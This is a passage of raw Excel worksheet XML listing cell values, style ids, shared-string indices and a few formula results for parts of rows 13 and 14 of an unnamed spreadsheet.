      <c r="FT13" s="501">
        <v>0</v>
      </c>
      <c r="FU13" s="111">
        <v>0</v>
      </c>
      <c r="FV13" s="111">
        <v>0</v>
      </c>
      <c r="FW13" s="112">
        <v>0</v>
      </c>
      <c r="FX13" s="113">
        <v>0</v>
      </c>
      <c r="FY13" s="114">
        <v>0</v>
      </c>
      <c r="FZ13" s="503">
        <v>0</v>
      </c>
      <c r="GA13" s="115">
        <v>0</v>
      </c>
      <c r="GB13" s="115">
        <v>0</v>
      </c>
      <c r="GC13" s="116">
        <v>0</v>
      </c>
      <c r="GD13" s="250">
        <v>2</v>
      </c>
      <c r="GE13" s="251" t="s">
        <v>2596</v>
      </c>
      <c r="GF13" s="505">
        <v>2</v>
      </c>
      <c r="GG13" s="252" t="s">
        <v>1903</v>
      </c>
      <c r="GH13" s="252">
        <v>2</v>
      </c>
      <c r="GI13" s="253">
        <v>1</v>
      </c>
      <c r="GJ13" s="101">
        <v>2</v>
      </c>
      <c r="GK13" s="102" t="s">
        <v>2596</v>
      </c>
      <c r="GL13" s="102">
        <v>2</v>
      </c>
      <c r="GM13" s="103" t="s">
        <v>1903</v>
      </c>
      <c r="GN13" s="103">
        <v>2</v>
      </c>
      <c r="GO13" s="104">
        <v>1</v>
      </c>
      <c r="GP13" s="105">
        <v>0</v>
      </c>
      <c r="GQ13" s="106">
        <v>0</v>
      </c>
      <c r="GR13" s="497">
        <v>0</v>
      </c>
      <c r="GS13" s="107">
        <v>0</v>
      </c>
      <c r="GT13" s="107">
        <v>0</v>
      </c>
      <c r="GU13" s="108">
        <v>0</v>
      </c>
      <c r="GV13" s="109">
        <v>0</v>
      </c>
      <c r="GW13" s="110">
        <v>0</v>
      </c>
      <c r="GX13" s="501">
        <v>0</v>
      </c>
      <c r="GY13" s="111">
        <v>0</v>
      </c>
      <c r="GZ13" s="111">
        <v>0</v>
      </c>
      <c r="HA13" s="112">
        <v>0</v>
      </c>
      <c r="HB13" s="113">
        <v>0</v>
      </c>
      <c r="HC13" s="114">
        <v>0</v>
      </c>
      <c r="HD13" s="503">
        <v>0</v>
      </c>
      <c r="HE13" s="115">
        <v>0</v>
      </c>
      <c r="HF13" s="115">
        <v>0</v>
      </c>
      <c r="HG13" s="116">
        <v>0</v>
      </c>
      <c r="HH13" s="101">
        <v>0</v>
      </c>
      <c r="HI13" s="102">
        <v>0</v>
      </c>
      <c r="HJ13" s="102">
        <v>0</v>
      </c>
      <c r="HK13" s="103">
        <v>0</v>
      </c>
      <c r="HL13" s="103">
        <v>0</v>
      </c>
      <c r="HM13" s="104">
        <v>0</v>
      </c>
      <c r="HN13" s="105">
        <v>0</v>
      </c>
      <c r="HO13" s="106">
        <v>0</v>
      </c>
      <c r="HP13" s="497">
        <v>0</v>
      </c>
      <c r="HQ13" s="107">
        <v>0</v>
      </c>
      <c r="HR13" s="107">
        <v>0</v>
      </c>
      <c r="HS13" s="108">
        <v>0</v>
      </c>
      <c r="HT13" s="109">
        <v>0</v>
      </c>
      <c r="HU13" s="110">
        <v>0</v>
      </c>
      <c r="HV13" s="501">
        <v>0</v>
      </c>
      <c r="HW13" s="111">
        <v>0</v>
      </c>
      <c r="HX13" s="111">
        <v>0</v>
      </c>
      <c r="HY13" s="112">
        <v>0</v>
      </c>
      <c r="HZ13" s="113">
        <v>4</v>
      </c>
      <c r="IA13" s="114" t="s">
        <v>2597</v>
      </c>
      <c r="IB13" s="503">
        <v>1</v>
      </c>
      <c r="IC13" s="115" t="s">
        <v>2598</v>
      </c>
      <c r="ID13" s="115">
        <v>1</v>
      </c>
      <c r="IE13" s="116">
        <v>1</v>
      </c>
      <c r="IF13" s="250">
        <v>23</v>
      </c>
      <c r="IG13" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="IH13" s="505">
        <v>15</v>
      </c>
      <c r="II13" s="252" t="s">
        <v>2600</v>
      </c>
      <c r="IJ13" s="252">
        <v>15</v>
      </c>
      <c r="IK13" s="253">
        <v>1</v>
      </c>
      <c r="IL13" s="101">
        <v>27</v>
      </c>
      <c r="IM13" s="102" t="s">
        <v>2601</v>
      </c>
      <c r="IN13" s="102">
        <v>16</v>
      </c>
      <c r="IO13" s="103" t="s">
        <v>2602</v>
      </c>
      <c r="IP13" s="103">
        <v>16</v>
      </c>
      <c r="IQ13" s="104">
        <v>1</v>
      </c>
      <c r="IR13" s="105">
        <v>0</v>
      </c>
      <c r="IS13" s="106">
        <v>0</v>
      </c>
      <c r="IT13" s="497">
        <v>0</v>
      </c>
      <c r="IU13" s="107">
        <v>0</v>
      </c>
      <c r="IV13" s="107">
        <v>0</v>
      </c>
      <c r="IW13" s="108">
        <v>0</v>
      </c>
      <c r="IX13" s="109">
        <v>0</v>
      </c>
      <c r="IY13" s="110">
        <v>0</v>
      </c>
      <c r="IZ13" s="501">
        <v>0</v>
      </c>
      <c r="JA13" s="111">
        <v>0</v>
      </c>
      <c r="JB13" s="111">
        <v>0</v>
      </c>
      <c r="JC13" s="112">
        <v>0</v>
      </c>
      <c r="JD13" s="113">
        <v>0</v>
      </c>
      <c r="JE13" s="114">
        <v>0</v>
      </c>
      <c r="JF13" s="503">
        <v>0</v>
      </c>
      <c r="JG13" s="115">
        <v>0</v>
      </c>
      <c r="JH13" s="115">
        <v>0</v>
      </c>
      <c r="JI13" s="116">
        <v>0</v>
      </c>
      <c r="JJ13" s="101">
        <v>0</v>
      </c>
      <c r="JK13" s="102">
        <v>0</v>
      </c>
      <c r="JL13" s="102">
        <v>0</v>
      </c>
      <c r="JM13" s="103">
        <v>0</v>
      </c>
      <c r="JN13" s="103">
        <v>0</v>
      </c>
      <c r="JO13" s="104">
        <v>0</v>
      </c>
      <c r="JP13" s="105">
        <v>0</v>
      </c>
      <c r="JQ13" s="106">
        <v>0</v>
      </c>
      <c r="JR13" s="497">
        <v>0</v>
      </c>
      <c r="JS13" s="107">
        <v>0</v>
      </c>
      <c r="JT13" s="107">
        <v>0</v>
      </c>
      <c r="JU13" s="108">
        <v>0</v>
      </c>
      <c r="JV13" s="109">
        <v>0</v>
      </c>
      <c r="JW13" s="110">
        <v>0</v>
      </c>
      <c r="JX13" s="501">
        <v>0</v>
      </c>
      <c r="JY13" s="111">
        <v>0</v>
      </c>
      <c r="JZ13" s="111">
        <v>0</v>
      </c>
      <c r="KA13" s="112">
        <v>0</v>
      </c>
      <c r="KB13" s="113">
        <v>0</v>
      </c>
      <c r="KC13" s="114">
        <v>0</v>
      </c>
      <c r="KD13" s="503">
        <v>0</v>
      </c>
      <c r="KE13" s="115">
        <v>0</v>
      </c>
      <c r="KF13" s="115">
        <v>0</v>
      </c>
      <c r="KG13" s="116">
        <v>0</v>
      </c>
      <c r="KH13" s="250">
        <v>0</v>
      </c>
      <c r="KI13" s="251">
        <v>0</v>
      </c>
      <c r="KJ13" s="505">
        <v>0</v>
      </c>
      <c r="KK13" s="252">
        <v>0</v>
      </c>
      <c r="KL13" s="252">
        <v>0</v>
      </c>
      <c r="KM13" s="253">
        <v>0</v>
      </c>
      <c r="KN13" s="101">
        <v>0</v>
      </c>
      <c r="KO13" s="102">
        <v>0</v>
      </c>
      <c r="KP13" s="102">
        <v>0</v>
      </c>
      <c r="KQ13" s="103">
        <v>0</v>
      </c>
      <c r="KR13" s="103">
        <v>0</v>
      </c>
      <c r="KS13" s="104">
        <v>0</v>
      </c>
      <c r="KT13" s="105">
        <v>0</v>
      </c>
      <c r="KU13" s="106">
        <v>0</v>
      </c>
      <c r="KV13" s="497">
        <v>0</v>
      </c>
      <c r="KW13" s="107">
        <v>0</v>
      </c>
      <c r="KX13" s="107">
        <v>0</v>
      </c>
      <c r="KY13" s="108">
        <v>0</v>
      </c>
      <c r="KZ13" s="109">
        <v>0</v>
      </c>
      <c r="LA13" s="110">
        <v>0</v>
      </c>
      <c r="LB13" s="501">
        <v>0</v>
      </c>
      <c r="LC13" s="111">
        <v>0</v>
      </c>
      <c r="LD13" s="111">
        <v>0</v>
      </c>
      <c r="LE13" s="112">
        <v>0</v>
      </c>
      <c r="LF13" s="113">
        <v>0</v>
      </c>
      <c r="LG13" s="114">
        <v>0</v>
      </c>
      <c r="LH13" s="503">
        <v>0</v>
      </c>
      <c r="LI13" s="115">
        <v>0</v>
      </c>
      <c r="LJ13" s="115">
        <v>0</v>
      </c>
      <c r="LK13" s="116">
        <v>0</v>
      </c>
      <c r="LL13" s="117">
        <v>10</v>
      </c>
      <c r="LM13" s="507">
        <v>9</v>
      </c>
      <c r="LN13" s="119">
        <v>0</v>
      </c>
      <c r="LO13" s="119">
        <v>5</v>
      </c>
      <c r="LP13" s="119">
        <v>7</v>
      </c>
      <c r="LQ13" s="119">
        <v>0</v>
      </c>
      <c r="LR13" s="119">
        <v>7</v>
      </c>
      <c r="LS13" s="119">
        <v>7</v>
      </c>
      <c r="LT13" s="382"/>
      <c r="LU13" s="117">
        <v>0</v>
      </c>
      <c r="LV13" s="118">
        <v>0</v>
      </c>
      <c r="LW13" s="507">
        <v>0</v>
      </c>
      <c r="LX13" s="119">
        <v>0</v>
      </c>
      <c r="LY13" s="119">
        <v>0</v>
      </c>
      <c r="LZ13" s="119">
        <v>0</v>
      </c>
      <c r="MA13" s="117">
        <v>0</v>
      </c>
      <c r="MB13" s="118">
        <v>0</v>
      </c>
      <c r="MC13" s="507">
        <v>0</v>
      </c>
      <c r="MD13" s="119">
        <v>0</v>
      </c>
      <c r="ME13" s="119">
        <v>0</v>
      </c>
      <c r="MF13" s="119">
        <v>0</v>
      </c>
      <c r="MG13" s="117">
        <v>0</v>
      </c>
      <c r="MH13" s="118">
        <v>0</v>
      </c>
      <c r="MI13" s="507">
        <v>0</v>
      </c>
      <c r="MJ13" s="119">
        <v>0</v>
      </c>
      <c r="MK13" s="119">
        <v>0</v>
      </c>
      <c r="ML13" s="119">
        <v>0</v>
      </c>
      <c r="MM13" s="117">
        <v>0</v>
      </c>
      <c r="MN13" s="118">
        <v>0</v>
      </c>
      <c r="MO13" s="507">
        <v>0</v>
      </c>
      <c r="MP13" s="119">
        <v>0</v>
      </c>
      <c r="MQ13" s="119">
        <v>0</v>
      </c>
      <c r="MR13" s="119">
        <v>0</v>
      </c>
      <c r="MS13" s="117">
        <v>0</v>
      </c>
      <c r="MT13" s="118">
        <v>0</v>
      </c>
      <c r="MU13" s="507">
        <v>0</v>
      </c>
      <c r="MV13" s="119">
        <v>0</v>
      </c>
      <c r="MW13" s="119">
        <v>0</v>
      </c>
      <c r="MX13" s="119">
        <v>0</v>
      </c>
      <c r="MY13" s="117">
        <v>0</v>
      </c>
      <c r="MZ13" s="118">
        <v>0</v>
      </c>
      <c r="NA13" s="507">
        <v>0</v>
      </c>
      <c r="NB13" s="119">
        <v>0</v>
      </c>
      <c r="NC13" s="119">
        <v>0</v>
      </c>
      <c r="ND13" s="119">
        <v>0</v>
      </c>
      <c r="NE13" s="117">
        <v>2</v>
      </c>
      <c r="NF13" s="118" t="s">
        <v>4166</v>
      </c>
      <c r="NG13" s="507">
        <v>1</v>
      </c>
      <c r="NH13" s="119" t="s">
        <v>2538</v>
      </c>
      <c r="NI13" s="119">
        <v>1</v>
      </c>
      <c r="NJ13" s="119">
        <v>1</v>
      </c>
      <c r="NK13" s="117">
        <v>0</v>
      </c>
      <c r="NL13" s="118">
        <v>0</v>
      </c>
      <c r="NM13" s="507">
        <v>0</v>
      </c>
      <c r="NN13" s="119">
        <v>0</v>
      </c>
      <c r="NO13" s="119">
        <v>0</v>
      </c>
      <c r="NP13" s="119">
        <v>0</v>
      </c>
      <c r="NQ13" s="117">
        <v>0</v>
      </c>
      <c r="NR13" s="118">
        <v>0</v>
      </c>
      <c r="NS13" s="507">
        <v>0</v>
      </c>
      <c r="NT13" s="119">
        <v>0</v>
      </c>
      <c r="NU13" s="119">
        <v>0</v>
      </c>
      <c r="NV13" s="119">
        <v>0</v>
      </c>
      <c r="NW13" s="117">
        <v>8</v>
      </c>
      <c r="NX13" s="118" t="s">
        <v>4324</v>
      </c>
      <c r="NY13" s="507">
        <v>8</v>
      </c>
      <c r="NZ13" s="119" t="s">
        <v>4325</v>
      </c>
      <c r="OA13" s="119">
        <v>4</v>
      </c>
      <c r="OB13" s="119">
        <v>7</v>
      </c>
      <c r="OC13" s="120">
        <v>5</v>
      </c>
      <c r="OD13" s="120">
        <v>2</v>
      </c>
      <c r="OE13" s="120">
        <v>2</v>
      </c>
      <c r="OF13" s="120">
        <v>1</v>
      </c>
      <c r="OG13" s="120">
        <v>1</v>
      </c>
      <c r="OH13" s="120">
        <v>1</v>
      </c>
      <c r="OI13" s="120">
        <v>1</v>
      </c>
      <c r="OJ13" s="120">
        <v>1</v>
      </c>
      <c r="OK13" s="383"/>
      <c r="OL13" s="120">
        <v>1</v>
      </c>
      <c r="OM13" s="120">
        <v>1</v>
      </c>
      <c r="ON13" s="120">
        <v>1</v>
      </c>
      <c r="OO13" s="120" t="s">
        <v>2603</v>
      </c>
      <c r="OP13" s="120">
        <v>1</v>
      </c>
      <c r="OQ13" s="464">
        <v>1</v>
      </c>
      <c r="OR13" s="120">
        <v>4</v>
      </c>
      <c r="OS13" s="120">
        <v>4</v>
      </c>
      <c r="OT13" s="120">
        <v>1</v>
      </c>
      <c r="OU13" s="120" t="s">
        <v>2604</v>
      </c>
      <c r="OV13" s="120">
        <v>1</v>
      </c>
      <c r="OW13" s="464">
        <v>1</v>
      </c>
      <c r="OX13" s="120">
        <v>0</v>
      </c>
      <c r="OY13" s="120">
        <v>0</v>
      </c>
      <c r="OZ13" s="120">
        <v>0</v>
      </c>
      <c r="PA13" s="120"/>
      <c r="PB13" s="120">
        <v>0</v>
      </c>
      <c r="PC13" s="464">
        <v>0</v>
      </c>
      <c r="PD13" s="120">
        <v>0</v>
      </c>
      <c r="PE13" s="120">
        <v>0</v>
      </c>
      <c r="PF13" s="120">
        <v>0</v>
      </c>
      <c r="PG13" s="120"/>
      <c r="PH13" s="120">
        <v>0</v>
      </c>
      <c r="PI13" s="464">
        <v>0</v>
      </c>
      <c r="PJ13" s="120">
        <v>0</v>
      </c>
      <c r="PK13" s="120">
        <v>0</v>
      </c>
      <c r="PL13" s="120">
        <v>0</v>
      </c>
      <c r="PM13" s="120"/>
      <c r="PN13" s="120">
        <v>0</v>
      </c>
      <c r="PO13" s="464">
        <v>0</v>
      </c>
      <c r="PP13" s="120">
        <v>0</v>
      </c>
      <c r="PQ13" s="120">
        <v>0</v>
      </c>
      <c r="PR13" s="120">
        <v>0</v>
      </c>
      <c r="PS13" s="120"/>
      <c r="PT13" s="120">
        <v>0</v>
      </c>
      <c r="PU13" s="464">
        <v>0</v>
      </c>
      <c r="PV13" s="120">
        <v>0</v>
      </c>
      <c r="PW13" s="120">
        <v>0</v>
      </c>
      <c r="PX13" s="120">
        <v>0</v>
      </c>
      <c r="PY13" s="120"/>
      <c r="PZ13" s="120">
        <v>0</v>
      </c>
      <c r="QA13" s="464">
        <v>0</v>
      </c>
      <c r="QB13" s="120">
        <v>5</v>
      </c>
      <c r="QC13" s="120">
        <v>5</v>
      </c>
      <c r="QD13" s="120">
        <v>1</v>
      </c>
      <c r="QE13" s="120" t="s">
        <v>2541</v>
      </c>
      <c r="QF13" s="120">
        <v>1</v>
      </c>
      <c r="QG13" s="464">
        <v>1</v>
      </c>
      <c r="QH13" s="120">
        <v>0</v>
      </c>
      <c r="QI13" s="120">
        <v>0</v>
      </c>
      <c r="QJ13" s="120">
        <v>0</v>
      </c>
      <c r="QK13" s="120"/>
      <c r="QL13" s="120">
        <v>0</v>
      </c>
      <c r="QM13" s="464">
        <v>0</v>
      </c>
      <c r="QN13" s="120">
        <v>0</v>
      </c>
      <c r="QO13" s="120">
        <v>0</v>
      </c>
      <c r="QP13" s="120">
        <v>0</v>
      </c>
      <c r="QQ13" s="120"/>
      <c r="QR13" s="120">
        <v>0</v>
      </c>
      <c r="QS13" s="464">
        <v>0</v>
      </c>
      <c r="QT13" s="184"/>
      <c r="QU13" s="184"/>
      <c r="QV13" s="184"/>
      <c r="QW13" s="184"/>
      <c r="QX13" s="184"/>
      <c r="QY13" s="184"/>
      <c r="QZ13" s="184"/>
      <c r="RA13" s="184"/>
      <c r="RB13" s="184"/>
      <c r="RC13" s="184"/>
      <c r="RD13" s="184"/>
      <c r="RE13" s="184"/>
      <c r="RF13" s="184"/>
      <c r="RG13" s="184"/>
      <c r="RH13" s="184"/>
      <c r="RI13" s="184"/>
      <c r="RJ13" s="184"/>
      <c r="RK13" s="184"/>
      <c r="RL13" s="184"/>
      <c r="RM13" s="184"/>
      <c r="RN13" s="184"/>
      <c r="RO13" s="184"/>
      <c r="RP13" s="184"/>
      <c r="RQ13" s="184"/>
      <c r="RR13" s="184"/>
      <c r="RS13" s="184"/>
      <c r="RT13" s="184"/>
      <c r="RU13" s="184"/>
      <c r="RV13" s="184"/>
      <c r="RW13" s="184"/>
      <c r="RX13" s="184"/>
      <c r="RY13" s="184"/>
      <c r="RZ13" s="184"/>
      <c r="SA13" s="184"/>
      <c r="SB13" s="184"/>
      <c r="SC13" s="184"/>
      <c r="SD13" s="184"/>
      <c r="SE13" s="184"/>
      <c r="SF13" s="184"/>
      <c r="SG13" s="184"/>
      <c r="SH13" s="184"/>
      <c r="SI13" s="184"/>
      <c r="SJ13" s="184"/>
      <c r="SK13" s="184"/>
      <c r="SL13" s="184"/>
      <c r="SM13" s="184"/>
      <c r="SN13" s="184"/>
      <c r="SO13" s="184"/>
      <c r="SP13" s="184"/>
      <c r="SQ13" s="184"/>
      <c r="SR13" s="184"/>
      <c r="SS13" s="184"/>
      <c r="ST13" s="184"/>
      <c r="SU13" s="184"/>
      <c r="SV13" s="184"/>
      <c r="SW13" s="184"/>
      <c r="SX13" s="184"/>
      <c r="SY13" s="184"/>
      <c r="SZ13" s="184"/>
      <c r="TA13" s="184"/>
      <c r="TB13" s="184"/>
      <c r="TC13" s="184"/>
      <c r="TD13" s="184"/>
      <c r="TE13" s="184"/>
      <c r="TF13" s="184"/>
      <c r="TG13" s="184"/>
      <c r="TH13" s="184"/>
      <c r="TI13" s="184"/>
      <c r="TJ13" s="184"/>
      <c r="TK13" s="184"/>
      <c r="TL13" s="184"/>
      <c r="TM13" s="184"/>
      <c r="TN13" s="184"/>
      <c r="TO13" s="184"/>
      <c r="TP13" s="184"/>
      <c r="TQ13" s="184"/>
      <c r="TR13" s="184"/>
      <c r="TS13" s="184"/>
      <c r="TT13" s="184"/>
      <c r="TU13" s="184"/>
      <c r="TV13" s="184"/>
      <c r="TW13" s="184"/>
      <c r="TX13" s="184"/>
      <c r="TY13" s="184"/>
      <c r="TZ13" s="184"/>
      <c r="UA13" s="184"/>
      <c r="UB13" s="184"/>
      <c r="UC13" s="184"/>
      <c r="UD13" s="184"/>
      <c r="UE13" s="184"/>
      <c r="UF13" s="184"/>
      <c r="UG13" s="184"/>
      <c r="UH13" s="184"/>
      <c r="UI13" s="184"/>
      <c r="UJ13" s="184"/>
      <c r="UK13" s="184"/>
      <c r="UL13" s="184"/>
      <c r="UM13" s="184"/>
      <c r="UN13" s="184"/>
      <c r="UO13" s="184"/>
      <c r="UP13" s="184"/>
      <c r="UQ13" s="184"/>
      <c r="UR13" s="184"/>
      <c r="US13" s="184"/>
      <c r="UT13" s="184"/>
      <c r="UU13" s="184"/>
      <c r="UV13" s="184"/>
      <c r="UW13" s="184"/>
      <c r="UX13" s="184"/>
      <c r="UY13" s="184"/>
      <c r="UZ13" s="184"/>
      <c r="VA13" s="184"/>
      <c r="VB13" s="184"/>
      <c r="VC13" s="184"/>
      <c r="VD13" s="184"/>
      <c r="VE13" s="184"/>
      <c r="VF13" s="184"/>
      <c r="VG13" s="184"/>
      <c r="VH13" s="184"/>
      <c r="VI13" s="184"/>
      <c r="VJ13" s="184"/>
      <c r="VK13" s="184"/>
      <c r="VL13" s="184"/>
      <c r="VM13" s="184"/>
      <c r="VN13" s="184"/>
      <c r="VO13" s="184"/>
      <c r="VP13" s="184"/>
      <c r="VQ13" s="184"/>
      <c r="VR13" s="184"/>
      <c r="VS13" s="184"/>
      <c r="VT13" s="184"/>
      <c r="VU13" s="184"/>
      <c r="VV13" s="184"/>
      <c r="VW13" s="184"/>
      <c r="VX13" s="184"/>
      <c r="VY13" s="184"/>
    </row>
    <row r="14" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A14" s="82" t="s">
        <v>30</v>
      </c>
      <c r="B14" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C14" s="83" t="s">
        <v>309</v>
      </c>
      <c r="D14" s="83" t="s">
        <v>31</v>
      </c>
      <c r="E14" s="83">
        <f t="shared" si="2"/>
        <v>11</v>
      </c>
      <c r="F14" s="83" t="s">
        <v>32</v>
      </c>
      <c r="G14" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H14" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I14" s="81" t="s">
        <v>861</v>
      </c>
      <c r="J14" s="85" t="s">
        <v>782</v>
      </c>
      <c r="K14" s="81" t="s">
        <v>862</v>
      </c>
      <c r="L14" s="81" t="s">
        <v>863</v>
      </c>
      <c r="M14" s="378" t="s">
        <v>190</v>
      </c>
      <c r="N14" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O14" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P14" s="91"/>
      <c r="Q14" s="379" t="s">
        <v>8</v>
      </c>
      <c r="R14" s="92" t="s">
        <v>864</v>
      </c>
      <c r="S14" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T14" s="92" t="s">
        <v>865</v>
      </c>
      <c r="U14" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V14" s="95" t="s">
        <v>821</v>
      </c>
      <c r="W14" s="96" t="s">
        <v>866</v>
      </c>
      <c r="X14" s="97" t="s">
        <v>867</v>
      </c>
      <c r="Y14" s="83" t="s">
        <v>868</v>
      </c>
      <c r="Z14" s="98" t="s">
        <v>869</v>
      </c>
      <c r="AA14" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB14" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC14" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD14" s="83"/>
      <c r="AE14" s="83"/>
      <c r="AF14" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG14" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH14" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI14" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ14" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK14" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL14" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM14" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN14" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO14" s="356" t="s">
        <v>747</v>
      </c>
      <c r="AP14" s="357" t="s">
        <v>745</v>
      </c>
      <c r="AQ14" s="358">
        <v>3</v>
      </c>
      <c r="AR14" s="100"/>
      <c r="AS14" s="100">
        <v>1</v>
      </c>
      <c r="AT14" s="100">
        <v>0</v>
      </c>
      <c r="AU14" s="100">
        <v>1</v>
      </c>
      <c r="AV14" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW14" s="100">
        <v>1</v>
      </c>
      <c r="AX14" s="100">
        <v>1</v>
      </c>
      <c r="AY14" s="100">
        <v>0</v>
      </c>
      <c r="AZ14" s="100">
        <v>1</v>
      </c>
      <c r="BA14" s="381"/>
      <c r="BB14" s="101">
        <v>1</v>
      </c>
      <c r="BC14" s="102" t="s">
        <v>1796</v>
      </c>
      <c r="BD14" s="102">
        <v>1</v>
      </c>
      <c r="BE14" s="103" t="s">
        <v>336</v>
      </c>
      <c r="BF14" s="103">
        <v>1</v>
      </c>
      <c r="BG14" s="104">
        <v>1</v>
      </c>
      <c r="BH14" s="105">
        <v>0</v>
      </c>
      <c r="BI14" s="106">
        <v>0</v>
      </c>
      <c r="BJ14" s="497">
        <v>0</v>
      </c>
      <c r="BK14" s="107">
        <v>0</v>
      </c>
      <c r="BL14" s="107">
        <v>0</v>
      </c>
      <c r="BM14" s="108">
        <v>0</v>
      </c>
      <c r="BN14" s="109">
        <v>1</v>
      </c>
      <c r="BO14" s="110" t="s">
        <v>1796</v>
      </c>
      <c r="BP14" s="501">
        <v>1</v>
      </c>
      <c r="BQ14" s="111" t="s">
        <v>336</v>
      </c>
      <c r="BR14" s="111">
        <v>1</v>
      </c>
      <c r="BS14" s="112">
        <v>1</v>
      </c>
      <c r="BT14" s="113">
        <v>2</v>
      </c>
      <c r="BU14" s="114" t="s">
        <v>2605</v>
      </c>
      <c r="BV14" s="503">
        <v>2</v>
      </c>
      <c r="BW14" s="115" t="s">
        <v>2606</v>
      </c>
      <c r="BX14" s="115">
        <v>2</v>
      </c>
      <c r="BY14" s="116">
        <v>1</v>
      </c>
      <c r="BZ14" s="250">
        <v>20</v>
      </c>
      <c r="CA14" s="251" t="s">
        <v>2607</v>
      </c>
      <c r="CB14" s="505">
        <v>20</v>
      </c>
      <c r="CC14" s="252" t="s">
        <v>2608</v>
      </c>
      <c r="CD14" s="252">
        <v>18</v>
      </c>
      <c r="CE14" s="253">
        <v>3</v>
      </c>
      <c r="CF14" s="101">
        <v>22</v>
      </c>
      <c r="CG14" s="102" t="s">
        <v>2609</v>
      </c>
      <c r="CH14" s="102">
        <v>22</v>
      </c>
      <c r="CI14" s="103" t="s">
        <v>2610</v>
      </c>
      <c r="CJ14" s="103">
        <v>20</v>
      </c>
      <c r="CK14" s="104">
        <v>3</v>
      </c>
      <c r="CL14" s="105">
        <v>0</v>
      </c>
      <c r="CM14" s="106">
        <v>0</v>
      </c>
      <c r="CN14" s="497">
        <v>0</v>
      </c>
      <c r="CO14" s="107">
        <v>0</v>
      </c>
      <c r="CP14" s="107">
        <v>0</v>
      </c>
      <c r="CQ14" s="108">
        <v>0</v>
      </c>
      <c r="CR14" s="109">
        <v>0</v>
      </c>
      <c r="CS14" s="110">
        <v>0</v>
      </c>
      <c r="CT14" s="501">
        <v>0</v>
      </c>
      <c r="CU14" s="111">
        <v>0</v>
      </c>
      <c r="CV14" s="111">
        <v>0</v>
      </c>
      <c r="CW14" s="112">
        <v>0</v>
      </c>
      <c r="CX14" s="113">
        <v>1</v>
      </c>
      <c r="CY14" s="114" t="s">
        <v>1796</v>
      </c>
      <c r="CZ14" s="503">
        <v>1</v>
      </c>
      <c r="DA14" s="115" t="s">
        <v>336</v>
      </c>
      <c r="DB14" s="115">
        <v>1</v>
      </c>
      <c r="DC14" s="116">
        <v>1</v>
      </c>
      <c r="DD14" s="101">
        <v>0</v>
      </c>
      <c r="DE14" s="102">
        <v>0</v>
      </c>
      <c r="DF14" s="102">
        <v>0</v>
      </c>
      <c r="DG14" s="103">
        <v>0</v>
      </c>
      <c r="DH14" s="103">
        <v>0</v>
      </c>
      <c r="DI14" s="104">
        <v>0</v>
      </c>
      <c r="DJ14" s="105">
        <v>0</v>
      </c>
      <c r="DK14" s="106">
        <v>0</v>
      </c>
      <c r="DL14" s="497">
        <v>0</v>
      </c>
      <c r="DM14" s="107">
        <v>0</v>
      </c>
      <c r="DN14" s="107">
        <v>0</v>
      </c>
      <c r="DO14" s="108">
        <v>0</v>
      </c>
      <c r="DP14" s="109">
        <v>0</v>
      </c>
      <c r="DQ14" s="110">
        <v>0</v>
      </c>
      <c r="DR14" s="501">
        <v>0</v>
      </c>
      <c r="DS14" s="111">
        <v>0</v>
      </c>
      <c r="DT14" s="111">
        <v>0</v>
      </c>
      <c r="DU14" s="112">
        <v>0</v>
      </c>
      <c r="DV14" s="113">
        <v>1</v>
      </c>
      <c r="DW14" s="114" t="s">
        <v>2594</v>
      </c>
      <c r="DX14" s="503">
        <v>1</v>
      </c>
      <c r="DY14" s="115" t="s">
        <v>2595</v>
      </c>
      <c r="DZ14" s="115">
        <v>1</v>
      </c>
      <c r="EA14" s="116">
        <v>1</v>
      </c>
      <c r="EB14" s="250">
        <v>0</v>
      </c>
      <c r="EC14" s="251">
        <v>0</v>
      </c>
      <c r="ED14" s="505">
        <v>0</v>
      </c>
      <c r="EE14" s="252">
        <v>0</v>
      </c>
      <c r="EF14" s="252">
        <v>0</v>
      </c>
      <c r="EG14" s="253">
        <v>0</v>
      </c>
      <c r="EH14" s="101">
        <v>1</v>
      </c>
      <c r="EI14" s="102" t="s">
        <v>2594</v>
      </c>
      <c r="EJ14" s="102">
        <v>1</v>
      </c>
      <c r="EK14" s="103" t="s">
        <v>2595</v>
      </c>
      <c r="EL14" s="103">
        <v>1</v>
      </c>
      <c r="EM14" s="104">
        <v>1</v>
      </c>
      <c r="EN14" s="105">
        <v>0</v>
      </c>
      <c r="EO14" s="106">
        <v>0</v>
      </c>
      <c r="EP14" s="497">
        <v>0</v>
      </c>
      <c r="EQ14" s="107">
        <v>0</v>
      </c>
      <c r="ER14" s="107">
        <v>0</v>
      </c>
      <c r="ES14" s="108">
        <v>0</v>
      </c>
      <c r="ET14" s="109">
        <v>0</v>
      </c>
      <c r="EU14" s="110">
        <v>0</v>
      </c>
      <c r="EV14" s="501">
        <v>0</v>
      </c>
      <c r="EW14" s="111">
        <v>0</v>
      </c>
      <c r="EX14" s="111">
        <v>0</v>
      </c>
      <c r="EY14" s="112">
        <v>0</v>
      </c>
      <c r="EZ14" s="113">
        <v>0</v>
      </c>
      <c r="FA14" s="114">
        <v>0</v>
      </c>
      <c r="FB14" s="503">
        <v>0</v>
      </c>
      <c r="FC14" s="115">
        <v>0</v>
      </c>
      <c r="FD14" s="115">
        <v>0</v>
      </c>
      <c r="FE14" s="116">
        <v>0</v>
      </c>
      <c r="FF14" s="101">
        <v>1</v>
      </c>
